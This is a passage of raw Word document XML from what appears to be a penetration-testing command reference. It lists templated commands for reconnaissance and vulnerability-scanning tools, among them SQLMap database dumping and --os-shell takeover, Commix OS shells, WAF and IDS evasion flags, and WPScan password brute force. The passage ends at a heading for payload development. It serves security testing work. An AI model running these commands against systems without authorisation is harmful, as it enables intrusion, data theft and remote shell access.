        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ultra-fast port scanner that feeds results directly into Nmap.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rustscan -a {target} -o /opt/tsec/output/2.2.1_rustscan_quick_{target}.txt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rustscan -a {target} -p 1-65535 -o /opt/tsec/output/2.2.2_rustscan_all_{target}.txt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rustscan -a {target} -- -sV -sC -oN /opt/tsec/output/2.2.3_rustscan_nmap_{target}.nmap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rustscan -a {target1},{target2},{target3} -o /opt/tsec/output/2.2.4_rustscan_batch.txt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rustscan -a {target} --scripts none -- -sV -oN /opt/tsec/output/2.2.5_rustscan_custom_{target}.nmap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rustscan -a {target} --top -o /opt/tsec/output/2.2.6_rustscan_top_{target}.txt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rustscan -a {target} -u 1000 -o /opt/tsec/output/2.2.7_rustscan_udp_{target}.txt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rustscan -a {target} -b 500 -o /opt/tsec/output/2.2.8_rustscan_rate_{target}.txt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rustscan -a {target} --format json -o /opt/tsec/output/2.2.9_rustscan_{target}.json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rustscan -a {target} -p 1-65535 -- -sV -sC -O -A -oN /opt/tsec/output/2.2.10_rustscan_full_{target}.nmap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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="tool-2.3-masscan"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.3 — Masscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Internet-scale port scanner for large network ranges.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CIDR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masscan {cidr} -p{ports} --rate 1000 -oB /opt/tsec/output/2.3.1_masscan_{cidr}.bin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masscan {cidr} -p{ports} --rate 1000 -oL /opt/tsec/output/2.3.2_masscan_{cidr}.list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masscan {cidr} -p{ports} --rate 1000 -oJ /opt/tsec/output/2.3.3_masscan_{cidr}.json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masscan {cidr} -p{ports} --rate 1000 -oX /opt/tsec/output/2.3.4_masscan_{cidr}.xml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masscan --resume /opt/tsec/output/2.3.1_masscan_{cidr}.bin -oL /opt/tsec/output/2.3.5_masscan_resume.list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masscan {cidr} -p{ports} --rate 1000 --randomize-hosts -oL /opt/tsec/output/2.3.6_masscan_random.list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masscan {cidr} -p{ports} --excludefile {exclude_file} --rate 1000 -oL /opt/tsec/output/2.3.7_masscan_exclude.list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100 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masscan {cidr} --top-ports 100 --rate 1000 -oL /opt/tsec/output/2.3.8_masscan_top100.list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Grab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masscan {cidr} -p{ports} --banners --rate 1000 -oJ /opt/tsec/output/2.3.9_masscan_banners.json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Range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masscan {cidr} -p1-65535 --rate 10000 -oL /opt/tsec/output/2.3.10_masscan_full.list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</w:tbl>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="tool-2.4-naabu"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.4 — Naabu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast port scanner with host discovery and Nmap integration.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naabu -host {target} -o /opt/tsec/output/2.4.1_naabu_{target}.txt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naabu -host {cidr} -o /opt/tsec/output/2.4.2_naabu_cidr.txt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naabu -host {target} -top-ports 1000 -o /opt/tsec/output/2.4.3_naabu_top1000_{target}.txt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Nmap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naabu -host {target} -nmap-cli 'nmap -sV -sC' -o /opt/tsec/output/2.4.4_naabu_nmap_{target}.txt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naabu -host {target} -exclude-ports 80,443 -o /opt/tsec/output/2.4.5_naabu_exclude_{target}.txt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naabu -host {target} -rate 500 -o /opt/tsec/output/2.4.6_naabu_rate_{target}.txt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Exclusion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naabu -host {target} -exclude-cdn -o /opt/tsec/output/2.4.7_naabu_nocdn_{target}.txt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naabu -host {target} -json -o /opt/tsec/output/2.4.8_naabu_{target}.json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naabu -host {target} -stream -o /opt/tsec/output/2.4.9_naabu_stream_{target}.txt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Port + Nmap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naabu -host {target} -p - -nmap-cli 'nmap -sV -sC -O -A' -o /opt/tsec/output/2.4.10_naabu_full_{target}.txt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40"/>
    <w:bookmarkStart w:id="41" w:name="tool-2.5-httpx"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.5 — HTTPX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast, multi-purpose HTTP prober with advanced fingerprinting.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-l {host_list} -o /opt/tsec/output/2.5.1_httpx_probe.txt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Detect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-l {host_list} -tech-detect -o /opt/tsec/output/2.5.2_httpx_tech.txt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-l {host_list} -status-code -o /opt/tsec/output/2.5.3_httpx_status.txt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Grab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-l {host_list} -title -o /opt/tsec/output/2.5.4_httpx_title.txt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-l {host_list} -screenshot -o /opt/tsec/output/2.5.5_httpx_screenshots/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-l {host_list} -web-server -o /opt/tsec/output/2.5.6_httpx_server.txt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-l {host_list} -cdn -o /opt/tsec/output/2.5.7_httpx_cdn.txt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Favicon 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-l {host_list} -favicon -o /opt/tsec/output/2.5.8_httpx_favicon.txt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-l {host_list} -json -o /opt/tsec/output/2.5.9_httpx.json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-l {host_list} -tech-detect -status-code -title -web-server -cdn -json -o /opt/tsec/output/2.5.10_httpx_full.json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41"/>
    <w:bookmarkStart w:id="42" w:name="tool-2.6-dnsx"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.6 — DNSX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast, multi-purpose DNS toolkit for DNS enumeration and verification.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dnsx -l {domain_list} -a -resp -o /opt/tsec/output/2.6.1_dnsx_a.txt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dnsx -l {domain_list} -aaaa -resp -o /opt/tsec/output/2.6.2_dnsx_aaaa.txt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dnsx -l {domain_list} -mx -resp -o /opt/tsec/output/2.6.3_dnsx_mx.txt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dnsx -l {domain_list} -ns -resp -o /opt/tsec/output/2.6.4_dnsx_ns.txt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dnsx -l {domain_list} -txt -resp -o /opt/tsec/output/2.6.5_dnsx_txt.txt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dnsx -l {domain_list} -cname -resp -o /opt/tsec/output/2.6.6_dnsx_cname.txt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 (Reverse)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dnsx -l {ip_list} -ptr -resp -o /opt/tsec/output/2.6.7_dnsx_ptr.txt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dnsx -l {domain_list} -soa -resp -o /opt/tsec/output/2.6.8_dnsx_soa.txt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Wildcard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dnsx -l {domain_list} -wd {wildcard_domain} -o /opt/tsec/output/2.6.9_dnsx_wildcard.txt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DNS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dnsx -l {domain_list} -a -aaaa -mx -ns -txt -cname -soa -json -o /opt/tsec/output/2.6.10_dnsx_full.json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42"/>
    <w:bookmarkStart w:id="43" w:name="tool-2.7-whatweb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.7 — WhatWeb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next-generation web scanner for technology fingerprinting.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whatweb {target} &gt; /opt/tsec/output/2.7.1_whatweb_{target}.txt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whatweb -i {url_list} &gt; /opt/tsec/output/2.7.2_whatweb_list.txt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whatweb -v {target} &gt; /opt/tsec/output/2.7.3_whatweb_verbose_{target}.txt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Aggression Level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whatweb -a 3 {target} &gt; /opt/tsec/output/2.7.4_whatweb_aggro_{target}.txt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whatweb --colour=always {target} &gt; /opt/tsec/output/2.7.5_whatweb_colour_{target}.txt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whatweb --log-json /opt/tsec/output/2.7.6_whatweb_{target}.json {target}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whatweb --log-xml /opt/tsec/output/2.7.7_whatweb_{target}.xml {target}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whatweb --log-sql /opt/tsec/output/2.7.8_whatweb_{target}.db {target}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whatweb --proxy {proxy} {target} &gt; /opt/tsec/output/2.7.9_whatweb_proxy_{target}.txt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whatweb -a 3 -v --log-json /opt/tsec/output/2.7.10_whatweb_full_{target}.json {target}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43"/>
    <w:bookmarkStart w:id="44" w:name="tool-2.8-cloudlist"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.8 — Cloudlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Multi-cloud asset discovery tool for AWS, Azure, GCP, and more.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cloudlist -provider aws -o /opt/tsec/output/2.8.1_cloudlist_aws.txt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cloudlist -provider azure -o /opt/tsec/output/2.8.2_cloudlist_azure.txt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cloudlist -provider gcp -o /opt/tsec/output/2.8.3_cloudlist_gcp.txt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cloudlist -provider do -o /opt/tsec/output/2.8.4_cloudlist_do.txt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Linode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cloudlist -provider linode -o /opt/tsec/output/2.8.5_cloudlist_linode.txt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Providers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cloudlist -o /opt/tsec/output/2.8.6_cloudlist_all.txt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cloudlist -json -o /opt/tsec/output/2.8.7_cloudlist.json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cloudlist -host-only -o /opt/tsec/output/2.8.8_cloudlist_hosts.txt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cloudlist -ip-only -o /opt/tsec/output/2.8.9_cloudlist_ips.txt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cloudlist -json -o /opt/tsec/output/2.8.10_cloudlist_full.json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44"/>
    <w:bookmarkStart w:id="45" w:name="tool-2.9-uncover"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.9 — Uncover</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Quickly discover exposed hosts on the internet using search engine APIs.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Shodan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 -q "{query}" -e shodan -o /opt/tsec/output/2.9.1_uncover_shodan.txt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Censys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 -q "{query}" -e censys -o /opt/tsec/output/2.9.2_uncover_censys.txt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FOFA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 -q "{query}" -e fofa -o /opt/tsec/output/2.9.3_uncover_fofa.txt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Hunter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 -q "{query}" -e hunter -o /opt/tsec/output/2.9.4_uncover_hunter.txt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Quake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 -q "{query}" -e quake -o /opt/tsec/output/2.9.5_uncover_quake.txt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Engines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 -q "{query}" -e shodan,censys,fofa -o /opt/tsec/output/2.9.6_uncover_multi.txt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 -q "{query}" -e shodan -json -o /opt/tsec/output/2.9.7_uncover.json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 -q "{query}" -e shodan -l {limit} -o /opt/tsec/output/2.9.8_uncover_limited.txt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 -q "{query}" -e shodan -field ip -o /opt/tsec/output/2.9.9_uncover_ips.txt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uncover -q "{query}" -e shodan,censys,fofa,hunter -json -o /opt/tsec/output/2.9.10_uncover_full.json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45"/>
    <w:bookmarkStart w:id="46" w:name="tool-2.10-eyewitness"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 2.10 — EyeWitness</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Take screenshots of websites and identify default credentials.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eyewitness --web -f {url_list} -d /opt/tsec/output/2.10.1_eyewitness_web/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eyewitness --web --single {url} -d /opt/tsec/output/2.10.2_eyewitness_single/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RDP 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eyewitness --rdp -f {ip_list} -d /opt/tsec/output/2.10.3_eyewitness_rdp/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VNC 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eyewitness --vnc -f {ip_list} -d /opt/tsec/output/2.10.4_eyewitness_vnc/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Protocols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eyewitness --web --rdp --vnc -f {ip_list} -d /opt/tsec/output/2.10.5_eyewitness_all/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eyewitness --web -f {url_list} --proxy-ip {proxy_ip} --proxy-port {proxy_port} -d /opt/tsec/output/2.10.6_eyewitness_proxy/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eyewitness --web -f {url_list} --no-dns -d /opt/tsec/output/2.10.7_eyewitness_nodns/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Adjust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eyewitness --web -f {url_list} --timeout {seconds} -d /opt/tsec/output/2.10.8_eyewitness_timeout/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eyewitness --web -f {url_list} --user-agent "{ua}" -d /opt/tsec/output/2.10.9_eyewitness_ua/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Web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eyewitness --web --rdp --vnc -f {ip_list} --all-protocols --timeout 30 -d /opt/tsec/output/2.10.10_eyewitness_full/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8" w:name="phase-3-vulnerability-assessment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 3: Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Identify weaknesses in target systems through automated scanning and manual verification. Confirm findings with proof-of-concept validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="48" w:name="tool-3.1-nuclei"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.1 — Nuclei</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast, community-powered vulnerability scanner with 5000+ templates.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-u {target} -o /opt/tsec/output/3.1.1_nuclei_{target}.txt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-u {target} -s critical,high -o /opt/tsec/output/3.1.2_nuclei_severe_{target}.txt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-u {target} -t {template_dir} -o /opt/tsec/output/3.1.3_nuclei_custom_{target}.txt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-l {url_list} -o /opt/tsec/output/3.1.4_nuclei_list.txt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-u {target} -je -o /opt/tsec/output/3.1.5_nuclei_{target}.json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-u {target} -me /opt/tsec/output/3.1.6_nuclei_md_{target}/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SARIF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-u {target} -se /opt/tsec/output/3.1.7_nuclei_{target}.sarif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-u {target} -tags cve,rce -o /opt/tsec/output/3.1.8_nuclei_tags_{target}.txt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-u {target} -rl 100 -o /opt/tsec/output/3.1.9_nuclei_rate_{target}.txt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 -u {target} -s critical,high,medium -je -me /opt/tsec/output/3.1.10_nuclei_full_{target}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48"/>
    <w:bookmarkStart w:id="49" w:name="tool-3.2-nikto"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.2 — Nikto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive web server scanner for vulnerabilities and misconfigurations.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nikto -h {target} -o /opt/tsec/output/3.2.1_nikto_{target}.txt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nikto -h {target} -ssl -o /opt/tsec/output/3.2.2_nikto_ssl_{target}.txt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Tuning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nikto -h {target} -Tuning {tune_code} -o /opt/tsec/output/3.2.3_nikto_tuned_{target}.txt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CGI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nikto -h {target} -Cgidirs all -o /opt/tsec/output/3.2.4_nikto_cgi_{target}.txt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nikto -h {target} -mutate 3 -o /opt/tsec/output/3.2.5_nikto_mutate_{target}.txt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nikto -h {target} -dbcheck -o /opt/tsec/output/3.2.6_nikto_dbcheck_{target}.txt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nikto -h {target} -evasion {evasion_code} -o /opt/tsec/output/3.2.7_nikto_evasion_{target}.txt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nikto -h {target} -Plugins {plugin} -o /opt/tsec/output/3.2.8_nikto_plugins_{target}.txt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nikto -h {target} -id {user}:{pass} -o /opt/tsec/output/3.2.9_nikto_auth_{target}.txt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nikto -h {target} -ssl -Tuning x 6 -Cgidirs all -Plugins @ALL -o /opt/tsec/output/3.2.10_nikto_full_{target}.txt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49"/>
    <w:bookmarkStart w:id="50" w:name="tool-3.3-sqlmap"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.3 — SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automatic SQL injection and database takeover tool.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sqlmap -u "{url}" --batch -o /opt/tsec/output/3.3.1_sqlmap_{target}.txt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DBMS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sqlmap -u "{url}" --dbs --batch -o /opt/tsec/output/3.3.2_sqlmap_dbs_{target}.txt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sqlmap -u "{url}" -D {db} --tables --batch -o /opt/tsec/output/3.3.3_sqlmap_tables_{target}.txt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Dump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sqlmap -u "{url}" -D {db} -T {table} --dump --batch -o /opt/tsec/output/3.3.4_sqlmap_dump_{target}.txt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sqlmap -u "{url}" --os-shell --batch -o /opt/tsec/output/3.3.5_sqlmap_shell_{target}.txt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Risk/Level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sqlmap -u "{url}" --level 5 --risk 3 --batch -o /opt/tsec/output/3.3.6_sqlmap_deep_{target}.txt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sqlmap -u "{url}" --tamper {tamper} --batch -o /opt/tsec/output/3.3.7_sqlmap_tamper_{target}.txt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sqlmap -u "{url}" --cookie "{cookie}" --batch -o /opt/tsec/output/3.3.8_sqlmap_cookie_{target}.txt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sqlmap -r {request_file} --batch -o /opt/tsec/output/3.3.9_sqlmap_request_{target}.txt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Takeover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sqlmap -u "{url}" --dbs --tables --dump --os-shell --batch -o /opt/tsec/output/3.3.10_sqlmap_full_{target}.txt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50"/>
    <w:bookmarkStart w:id="51" w:name="tool-3.4-commix"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.4 — Commix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Automated command injection vulnerability testing.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commix -u "{url}" --batch -o /opt/tsec/output/3.4.1_commix_{target}.txt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commix -u "{url}" --data "{post_data}" --batch -o /opt/tsec/output/3.4.2_commix_post_{target}.txt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commix -u "{url}" --cookie "{cookie}" --batch -o /opt/tsec/output/3.4.3_commix_cookie_{target}.txt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commix -u "{url}" --header "{header}" --batch -o /opt/tsec/output/3.4.4_commix_header_{target}.txt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commix -u "{url}" --level 3 --batch -o /opt/tsec/output/3.4.5_commix_level3_{target}.txt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commix -u "{url}" --technique {tech} --batch -o /opt/tsec/output/3.4.6_commix_tech_{target}.txt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commix -u "{url}" --os-shell --batch -o /opt/tsec/output/3.4.7_commix_shell_{target}.txt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commix -u "{url}" -- enumeration --batch -o /opt/tsec/output/3.4.8_commix_enum_{target}.txt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commix -r {request_file} --batch -o /opt/tsec/output/3.4.9_commix_request_{target}.txt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commix -u "{url}" --level 3 --technique all --os-shell --batch -o /opt/tsec/output/3.4.10_commix_full_{target}.txt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51"/>
    <w:bookmarkStart w:id="52" w:name="tool-3.5-xsstrike"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.5 — XSStrike</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced XSS detection and exploitation suite.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xsstrike -u "{url}" -o /opt/tsec/output/3.5.1_xsstrike_{target}.txt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Crawl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xsstrike -u "{url}" --crawl -o /opt/tsec/output/3.5.2_xsstrike_crawl_{target}.txt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xsstrike -u "{url}" --fuzzer -o /opt/tsec/output/3.5.3_xsstrike_fuzz_{target}.txt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xsstrike -u "{url}" --params -o /opt/tsec/output/3.5.4_xsstrike_params_{target}.txt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xsstrike -u "{url}" --json -o /opt/tsec/output/3.5.5_xsstrike_{target}.json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 XSS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xsstrike -u "{url}" --blind -o /opt/tsec/output/3.5.6_xsstrike_blind_{target}.txt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xsstrike -u "{url}" --path -o /opt/tsec/output/3.5.7_xsstrike_path_{target}.txt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xsstrike -u "{url}" --threads 10 -o /opt/tsec/output/3.5.8_xsstrike_threads_{target}.txt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xsstrike -u "{url}" --file {payload_file} -o /opt/tsec/output/3.5.9_xsstrike_file_{target}.txt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xsstrike -u "{url}" --crawl --fuzzer --params --blind --threads 20 -o /opt/tsec/output/3.5.10_xsstrike_full_{target}.txt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52"/>
    <w:bookmarkStart w:id="53" w:name="tool-3.6-dalfox"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.6 — DalFox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modern, fast XSS vulnerability scanner and exploitation tool.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dalfox url {url} -o /opt/tsec/output/3.6.1_dalfox_{target}.txt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dalfox file {url_list} -o /opt/tsec/output/3.6.2_dalfox_file.txt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{url_list} \| dalfox pipe -o /opt/tsec/output/3.6.3_dalfox_pipe.txt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dalfox url {url} --mining-dom --mining-dict -o /opt/tsec/output/3.6.4_dalfox_mining_{target}.txt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Custom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dalfox url {url} --only-custom-payload --custom-payload {payload_file} -o /opt/tsec/output/3.6.5_dalfox_custom_{target}.txt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dalfox url {url} --blind {blind_url} -o /opt/tsec/output/3.6.6_dalfox_blind_{target}.txt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SQLi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dalfox url {url} --grep sqli -o /opt/tsec/output/3.6.7_dalfox_sqli_{target}.txt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dalfox url {url} --format json -o /opt/tsec/output/3.6.8_dalfox_{target}.json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WAF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dalfox url {url} --waf-evasion -o /opt/tsec/output/3.6.9_dalfox_waf_{target}.txt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dalfox url {url} --mining-dom --mining-dict --waf-evasion --format json -o /opt/tsec/output/3.6.10_dalfox_full_{target}.json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53"/>
    <w:bookmarkStart w:id="54" w:name="tool-3.7-openvas-gvm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.7 — OpenVAS / GVM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Full-featured vulnerability scanner with extensive database.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gvm-cli socket --xml "&lt;create_target&gt;&lt;name&gt;{name}&lt;/name&gt;&lt;hosts&gt;{target}&lt;/hosts&gt;&lt;/create_target&gt;" &gt; /opt/tsec/output/3.7.1_openvas_target.xml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gvm-cli socket --xml "&lt;create_task&gt;&lt;name&gt;{task_name}&lt;/name&gt;&lt;target id='{target_id}'/&gt;&lt;config id='daba56c8-73ec-11df-a475-002264764cea'/&gt;&lt;/create_task&gt;" &gt; /opt/tsec/output/3.7.2_openvas_task.xml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gvm-cli socket --xml "&lt;get_tasks/&gt;" &gt; /opt/tsec/output/3.7.3_openvas_tasks.xml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gvm-cli socket --xml "&lt;get_reports report_id='{report_id}' format_id='c1645568-627a-11e3-a660-406186ea4fc5'/" &gt; /opt/tsec/output/3.7.4_openvas_report.pdf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gvm-cli socket --xml "&lt;get_reports report_id='{report_id}' format_id='5057e5cc-b825-11e4-9d0e-28d24461215b'/" &gt; /opt/tsec/output/3.7.5_openvas_report.xml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gvm-cli socket --xml "&lt;get_reports report_id='{report_id}' format_id='c1645568-73ec-11df-a475-002264764cea'/" &gt; /opt/tsec/output/3.7.6_openvas_report.csv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gvm-cli socket --xml "&lt;start_task task_id='{task_id}'/&gt;" &gt; /opt/tsec/output/3.7.7_openvas_start.xml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gvm-cli socket --xml "&lt;get_results/&gt;" &gt; /opt/tsec/output/3.7.8_openvas_results.xml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Targets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gvm-cli socket --xml "&lt;get_targets/&gt;" &gt; /opt/tsec/output/3.7.9_openvas_targets.xml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gvm-script cli scan-start "Full and fast" {target} &gt; /opt/tsec/output/3.7.10_openvas_full.txt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54"/>
    <w:bookmarkStart w:id="55" w:name="tool-3.8-trivy"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.8 — Trivy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive vulnerability scanner for containers and infrastructure.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image {image} -o /opt/tsec/output/3.8.1_trivy_image_{image}.txt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fs {path} -o /opt/tsec/output/3.8.2_trivy_fs_{target}.txt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repo {repo_url} -o /opt/tsec/output/3.8.3_trivy_repo.txt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image {image} --format spdx-json -o /opt/tsec/output/3.8.4_trivy_sbom_{image}.json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image {image} --format json -o /opt/tsec/output/3.8.5_trivy_{image}.json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fs {path} --format sarif -o /opt/tsec/output/3.8.6_trivy_{target}.sarif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image {image} --severity HIGH,CRITICAL -o /opt/tsec/output/3.8.7_trivy_severe_{image}.txt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 Unfixed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image {image} --ignore-unfixed -o /opt/tsec/output/3.8.8_trivy_fixed_{image}.txt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config {path} -o /opt/tsec/output/3.8.9_trivy_config_{target}.txt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image {image} --severity HIGH,CRITICAL --format json -o /opt/tsec/output/3.8.10_trivy_full_{image}.json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55"/>
    <w:bookmarkStart w:id="56" w:name="tool-3.9-grype"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.9 — Grype</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fast vulnerability scanner for container images and filesystems.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grype {image} -o /opt/tsec/output/3.9.1_grype_image_{image}.txt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grype sbom:{sbom_file} -o /opt/tsec/output/3.9.2_grype_sbom.txt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grype {image} -o json &gt; /opt/tsec/output/3.9.3_grype_{image}.json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grype {image} -o cyclonedx-json &gt; /opt/tsec/output/3.9.4_grype_cyclonedx_{image}.json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grype {image} -o sarif &gt; /opt/tsec/output/3.9.5_grype_{image}.sarif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grype {image} --only-fixed -o /opt/tsec/output/3.9.6_grype_fixed_{image}.txt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grype {image} --fail-on critical -o /opt/tsec/output/3.9.7_grype_critical_{image}.txt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Squashed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grype {image} --scope squashed -o /opt/tsec/output/3.9.8_grype_squashed_{image}.txt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grype {image} --add-cpes-if-none -o /opt/tsec/output/3.9.9_grype_cpes_{image}.txt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grype {image} --only-fixed -o json &gt; /opt/tsec/output/3.9.10_grype_full_{image}.json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56"/>
    <w:bookmarkStart w:id="57" w:name="tool-3.10-wpscan"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tool 3.10 — Wpscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress vulnerability scanner with extensive plugin/theme detection.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{url} -o /opt/tsec/output/3.10.1_wpscan_{target}.txt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Enumerate Plugins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{url} --enumerate p -o /opt/tsec/output/3.10.2_wpscan_plugins_{target}.txt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Enumerate Themes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{url} --enumerate t -o /opt/tsec/output/3.10.3_wpscan_themes_{target}.txt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Enumerate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{url} --enumerate u -o /opt/tsec/output/3.10.4_wpscan_users_{target}.txt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{url} --passwords {wordlist} --usernames {user} -o /opt/tsec/output/3.10.5_wpscan_brute_{target}.txt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{url} --plugins-detection aggressive -o /opt/tsec/output/3.10.6_wpscan_aggro_{target}.txt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{url} --enumerate vp -o /opt/tsec/output/3.10.7_wpscan_vuln_{target}.txt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{url} --no-update -o /opt/tsec/output/3.10.8_wpscan_noupdate_{target}.txt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{url} --api-token {token} -o /opt/tsec/output/3.10.9_wpscan_api_{target}.txt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Enumeration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wpscan --url {url} --enumerate ap,at,cb,dbe,u,m --plugins-detection aggressive -o /opt/tsec/output/3.10.10_wpscan_full_{target}.txt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9" w:name="phase-4-payload-development-delivery"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 4: Payload Development &amp; Delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
